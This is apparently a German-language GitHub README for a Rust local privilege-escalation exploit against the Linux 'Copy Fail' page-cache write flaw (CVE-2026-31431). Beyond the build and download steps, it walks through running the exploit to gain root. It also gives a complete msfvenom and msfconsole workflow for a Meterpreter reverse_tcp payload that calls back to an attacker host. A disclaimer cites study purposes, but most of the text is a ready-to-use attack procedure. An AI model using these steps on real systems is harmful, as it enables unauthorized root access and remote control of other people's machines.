
# Rust-basierter lokaler Privilege-Escalation-Exploit für CVE-2026-31431, der die Ausführung von benutzerdefiniertem Shellcode wie Meterpreter auf Linux-Systemen ermöglicht.
Eine Rust-Implementierung eines lokalen Privilege-Escalation-Exploits für CVE-2026-31431 (Copy-Fail).
Er ermöglicht die Ausführung von angepasstem Shellcode (wie Meterpreter)
Xint hat CVE-2026-31431 offengelegt, eine Schwachstelle für beliebige Page-Cache-Schreibzugriffe, die AF_ALG und splice() verkettet, um eine 4-Byte-Schreibprimitive zu erreichen.
Quelle: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
Dieses Projekt wurde im Rahmen meines persönlichen Interesses am Studium der Cybersicherheit entwickelt. Es könnte jedoch möglicherweise für böswillige Zwecke missbraucht werden.
Bitte verwenden Sie dieses Tool NICHT für illegale Aktivitäten.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieser Software.
Hinweis: Die Originalarbeit verwendet komprimierten/codierten Shellcode (z. B.
/bin/sh). In dieser Implementierung habe ich ihn durch rohen (unkomprimierten)/bin/bash-Shellcode ersetzt, was die Anpassung oder direkte Ersetzung durch benutzerdefinierte Payloads erleichtert.
Klonen Sie das Projekt und führen Sie dann build.sh aus:
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh
Laden Sie das Release-Paket herunter und entpacken Sie es:
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86
Die Binärdateien bieten die folgenden Optionen:
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin
Auf dem verwundbaren System:
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
Verwenden Sie den folgenden Befehl (setzen Sie PrependSetUid auf True), um den Meterpreter-Payload zu generieren:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin
Auf dem Angreifer-System (Kali Linux):
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run
Auf dem verwundbaren System:
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin